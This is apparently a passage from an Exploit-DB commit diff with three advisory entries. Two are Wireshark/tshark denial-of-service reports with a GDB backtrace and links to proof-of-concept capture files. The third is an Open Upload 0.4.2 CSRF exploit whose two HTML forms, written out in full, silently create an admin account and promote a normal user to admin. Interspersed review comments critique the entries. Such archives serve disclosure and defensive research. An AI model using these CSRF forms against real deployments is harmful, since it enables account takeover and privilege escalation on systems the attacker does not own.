warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with libz 1.2.8, with GLib 2.48.0, with SMI 0.4.8, with c-ares 1.10.0, with Lua
5.2, with GnuTLS 3.4.10, with Gcrypt 1.6.5, with MIT Kerberos, with GeoIP.

Running on Linux 4.4.0-22-generic, with locale en_GB.UTF-8, with libpcap version
1.7.4, with libz 1.2.8, with GnuTLS 3.4.10, with Gcrypt 1.6.5.
Intel Core Processor (Haswell) (with SSE4.2)

Built using gcc 5.3.1 20160407.

--
Fuzzed PCAP takes 100% CPU and runs for a long time on tshark 2.0.2 and a recent build from repository ( commit 688d055acd523e645c1e87267dcf4a0a9867adbd ).

GDB backtrace from 'tshark -2 -V -r <pcap>' aborted after running for a while:

Program received signal SIGABRT, Aborted.
0x00007ffff45bb676 in rlc_decode_li (mode=RLC_AM, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, li=0x7fffffffbab0, max_li=16 '\020', li_on_2_bytes=0) at packet-rlc.c:1722
1722 next_bytes = li_on_2_bytes ? tvb_get_ntohs(tvb, hdr_len) : tvb_get_guint8(tvb, hdr_len);
123 tomb gdb execution "thread apply all bt" 321

Thread 1 (Thread 0x7ffff7fb9740 (LWP 1578)):
#0 0x00007ffff45bb676 in rlc_decode_li (mode=RLC_AM, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, li=0x7fffffffbab0, max_li=16 '\020', li_on_2_bytes=0) at packet-rlc.c:1722
#1 0x00007ffff45bde04 in dissect_rlc_am (channel=RLC_UL_DCCH, tvb=0x9342c0, pinfo=0xb04c18, top_level=0x0, tree=0x0, atm=0x0) at packet-rlc.c:2308
#2 0x00007ffff45be82a in dissect_rlc_dcch (tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, data=0x0) at packet-rlc.c:2477
#3 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb08f50, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:660
#4 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb08f50, tvb=0x9342c0, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:735
#5 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffedb08f50, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2791
#6 0x00007ffff3cadd68 in call_dissector_with_data (handle=0x7fffedb08f50, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2804
#7 0x00007ffff47e7679 in dissect_mac_fdd_dch (tvb=0xb0ac50, pinfo=0xb04c18, tree=0x0, data=0x0) at packet-umts_mac.c:564
#8 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb13b70, tvb=0xb0ac50, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:660
#9 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb13b70, tvb=0xb0ac50, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:735
#10 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffedb13b70, tvb=0xb0ac50, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2791
#11 0x00007ffff3cadd68 in call_dissector_with_data (handle=0x7fffedb13b70, tvb=0xb0ac50, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2804
#12 0x00007ffff47dab2e in dissect_tb_data (tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, offset=3, p_fp_info=0x7fffeca74180, data_handle=0x7ffff7aae8e8 <mac_fdd_dch_handle>, data=0x0) at packet-umts_fp.c:815
#13 0x00007ffff47decbb in dissect_dch_channel_info (tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, offset=3, p_fp_info=0x7fffeca74180, data=0x0) at packet-umts_fp.c:2557
#14 0x00007ffff47e476e in dissect_fp_common (tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at packet-umts_fp.c:4419
#15 0x00007ffff47e4add in dissect_fp (tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at packet-umts_fp.c:4507
#16 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffeda51580, tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:660
#17 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffeda51580, tvb=0xb0ac00, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:735
#18 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffeda51580, tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2791
#19 0x00007ffff3c99819 in try_conversation_dissector (addr_a=0xb04cf0, addr_b=0xb04cd8, ptype=PT_UDP, port_a=65359, port_b=8040, tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at conversation.c:1323
#20 0x00007ffff47d3839 in decode_udp_ports (tvb=0x848b70, offset=8, pinfo=0xb04c18, tree=0x0, uh_sport=8040, uh_dport=65359, uh_ulen=3554) at packet-udp.c:541
#21 0x00007ffff47d5e21 in dissect (tvb=0x848b70, pinfo=0xb04c18, tree=0x0, ip_proto=17) at packet-udp.c:1080
#22 0x00007ffff47d5e79 in dissect_udp (tvb=0x848b70, pinfo=0xb04c18, tree=0x0, data=0x7fffec869030) at packet-udp.c:1086
#23 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb13330, tvb=0x848b70, pinfo=0xb04c18, tree=0x0, data=0x7fffec869030) at packet.c:660
#24 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb13330, tvb=0x848b70, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x7fffec869030) at packet.c:735
#25 0x00007ffff3cab583 in dissector_try_uint_new (sub_dissectors=0x7b1cc0, uint_val=17, tvb=0x848b70, pinfo=0xb04c18, tree=0x0, add_proto_name=1, data=0x7fffec869030) at packet.c:1199
#26 0x00007ffff425e409 in ip_try_dissect (heur_first=0, tvb=0x848b70, pinfo=0xb04c18, tree=0x0, iph=0x7fffec869030) at packet-ip.c:1977
#27 0x00007ffff426037c in dissect_ip_v4 (tvb=0x848b20, pinfo=0xb04c18, parent_tree=0x0, data=0x0) at packet-ip.c:2476
#28 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb78930, tvb=0x848b20, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:660
#29 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb78930, tvb=0x848b20, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:735
#30 0x00007ffff3cab583 in dissector_try_uint_new (sub_dissectors=0x73c040, uint_val=2048, tvb=0x848b20, pinfo=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:1199
#31 0x00007ffff3cab5e4 in dissector_try_uint (sub_dissectors=0x73c040, uint_val=2048, tvb=0x848b20, pinfo=0xb04c18, tree=0x0) at packet.c:1225
#32 0x00007ffff40a1c60 in dissect_ethertype (tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffcc20) at packet-ethertype.c:262
#33 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffeda50000, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffcc20) at packet.c:660
#34 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffeda50000, tvb=0xb03d20, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x7fffffffcc20) at packet.c:735
#35 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffeda50000, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffcc20) at packet.c:2791
#36 0x00007ffff3cadd68 in call_dissector_with_data (handle=0x7fffeda50000, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffcc20) at packet.c:2804
#37 0x00007ffff40a04d5 in dissect_eth_common (tvb=0xb03d20, pinfo=0xb04c18, parent_tree=0x0, fcs_len=-1) at packet-eth.c:540
|
||||
#38 0x00007ffff40a106b in dissect_eth (tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0xad6928) at packet-eth.c:836
|
||||
#39 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb5c7a0, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0xad6928) at packet.c:660
|
||||
#40 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb5c7a0, tvb=0xb03d20, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0xad6928) at packet.c:735
|
||||
#41 0x00007ffff3cab583 in dissector_try_uint_new (sub_dissectors=0x73c2c0, uint_val=1, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, add_proto_name=1, data=0xad6928) at packet.c:1199
|
||||
#42 0x00007ffff40e9887 in dissect_frame (tvb=0xb03d20, pinfo=0xb04c18, parent_tree=0x0, data=0x7fffffffd380) at packet-frame.c:507
|
||||
#43 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffeda51950, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffd380) at packet.c:660
|
||||
#44 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffeda51950, tvb=0xb03d20, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x7fffffffd380) at packet.c:735
|
||||
#45 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffeda51950, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffd380) at packet.c:2791
|
||||
#46 0x00007ffff3cadd68 in call_dissector_with_data (handle=0x7fffeda51950, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffd380) at packet.c:2804
|
||||
#47 0x00007ffff3caa079 in dissect_record (edt=0xb04c00, file_type_subtype=1, phdr=0xad68c0, tvb=0xb03d20, fd=0x7fffffffd550, cinfo=0x0) at packet.c:543
|
||||
#48 0x00007ffff3c9ebf9 in epan_dissect_run (edt=0xb04c00, file_type_subtype=1, phdr=0xad68c0, tvb=0xb03d20, fd=0x7fffffffd550, cinfo=0x0) at epan.c:365
|
||||
#49 0x000000000041844c in process_packet_first_pass (cf=0x64f100 <cfile>, edt=0xb04c00, offset=20928, whdr=0xad68c0, pd=0xb04e20 "4\a\373\024t,\320\320\375+\004\300\b") at tshark.c:2694
|
||||
#50 0x0000000000418dd7 in load_cap_file (cf=0x64f100 <cfile>, save_file=0x0, out_file_type=2, out_file_name_res=0, max_packet_count=-1, max_byte_count=0) at tshark.c:2988
|
||||
#51 0x0000000000416fa0 in main (argc=5, argv=0x7fffffffdda8) at tshark.c:1873
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40199.zip
|
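Review bot: the backtrace as quoted gives the call path but not the failure itself; the deepest frame visible in this region is dissect_tb_data at packet-umts_fp.c:815, and every frame carries tree=0x0, so the crash is reached during tshark's first pass (process_packet_first_pass, tshark.c:2694) with no protocol tree being built, i.e. in data dissection rather than display. The entry should state the signal or sanitizer report and the faulting frame next to the trace, and cite the Wireshark bug-tracker ID or fixing commit for the UMTS FP dissector, so a reader can check whether a given build is affected instead of having to run the 40199.zip capture to find out.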
65
platforms/php/webapps/40193.txt
Executable file
@ -0,0 +1,65 @@
================================================================================================================
Open Upload 0.4.2 Remote Admin Add CSRF Exploit and Changing Normal user permission
================================================================================================================
# Exploit Title : Open Upload 0.4.2 Remote Admin Add CSRF Exploit
# Exploit Author : Vinesh Redkar (@b0rn2pwn)
# Email : vineshredkar89[at]gmail[d0t]com
# Date: 21/07/2016
# Vendor Homepage: http://openupload.sourceforge.net/
# Software Link: https://sourceforge.net/projects/openupload/
# Version: 0.4.2
# Tested on: Windows 10 OS

Open Upload Application is vulnerable to CSRF attack (No CSRF token in place) meaning
that if an admin user can be tricked to visit a crafted URL created by
attacker (via spear phishing/social engineering).

Once exploited, the attacker can login as the admin using the username and the password he posted in the form.

======================CSRF POC (Adding New user with Admin Privileges)==================================
CSRF PoC Code
<html>
<head>
<title>Remote Admin Add CSRF Exploit</title>
</head>
<H2>Remote Admin Add CSRF Exploit by b0rn2pwn</H2>
<body>
<form action="http://127.0.0.1/openupload/index.php" method="POST">
<input type="hidden" name="action" value="adminusers" />
<input type="hidden" name="step" value="2" />
<input type="hidden" name="adduserlogin" value="attacker" />
<input type="hidden" name="adduserpassword" value="attacker" />
<input type="hidden" name="adduserrepassword" value="attacker" />
<input type="hidden" name="addusername" value="attacker" />
<input type="hidden" name="adduseremail" value="attacker@gmail.com" />
<input type="hidden" name="addusergroup" value="admins" />
<input type="hidden" name="adduserlang" value="en" />
<input type="hidden" name="adduseractive" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

======================CSRF POC (Changing privileges from normal user to administer)==================================

<html>
<head>
<title>Change privilege normal user to administer CSRF Exploit</title>
</head>
<H2>Change privilege normal user to administer CSRF Exploit by b0rn2pwn</H2>
<body>
<form action="http://127.0.0.1/openupload/index.php" method="POST">
<input type="hidden" name="action" value="adminusers" />
<input type="hidden" name="step" value="3" />
<input type="hidden" name="login" value="normal user" />
<input type="hidden" name="edituserpassword" value="" />
<input type="hidden" name="edituserrepassword" value="" />
<input type="hidden" name="editusername" value="normaluser" />
<input type="hidden" name="edituseremail" value="normaluser@gmail.com" />
<input type="hidden" name="editusergroup" value="admins" />
<input type="hidden" name="edituserlang" value="en" />
<input type="hidden" name="edituseractive" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
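Review bot: the description says there is no CSRF token but never states the fix, and both PoC forms share the same root cause (the action=adminusers handler in index.php accepting step 2 and step 3 on a plain cross-site POST), so one sentence on mitigation belongs after the description: require a per-session anti-CSRF token on those steps and mark the session cookie SameSite, which closes both the add-user and the privilege-change form at once. Two smaller points: the forms post to http://127.0.0.1/openupload/index.php, so the target host is a placeholder and should be called out as such, and in both PoC documents the <H2> element sits between </head> and <body>, which is invalid HTML; it belongs inside <body>.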
27
platforms/win_x86-64/dos/40196.txt
Executable file
@ -0,0 +1,27 @@
GIOP capture

Build Information:
Version 2.0.3 (v2.0.3-0-geed34f0 from master-2.0)

Copyright 1998-2016 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Compiled (64-bit) with Qt 5.3.2, with WinPcap (4_1_3), with libz 1.2.8, with
GLib 2.42.0, with SMI 0.4.8, with c-ares 1.9.1, with Lua 5.2, with GnuTLS
3.2.15, with Gcrypt 1.6.2, with MIT Kerberos, with GeoIP, with QtMultimedia,
with AirPcap.

Running on 64-bit Windows 8.1, build 9600, with locale C, without WinPcap, with
GnuTLS 3.2.15, with Gcrypt 1.6.2, without AirPcap.
Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz (with SSE4.2), with 16334MB of
physical memory.


Built using Microsoft Visual C++ 12.0 build 40629


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40196.zip
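Review bot: this entry consists of a one-line title, the Wireshark build information and a link to 40196.zip; nothing states what the capture triggers (signal, dissector, faulting frame) or which versions other than 2.0.3 are affected, so a reader cannot tell the crash from a benign parse without opening the file. Add at least the crash frame in the GIOP dissector and the bug-tracker reference, as the backtrace entry earlier in this commit does, and say explicitly that the crash is reproduced by opening a capture file, which the "Running on ... without WinPcap" line already implies, so the affected code path is file parsing rather than live capture.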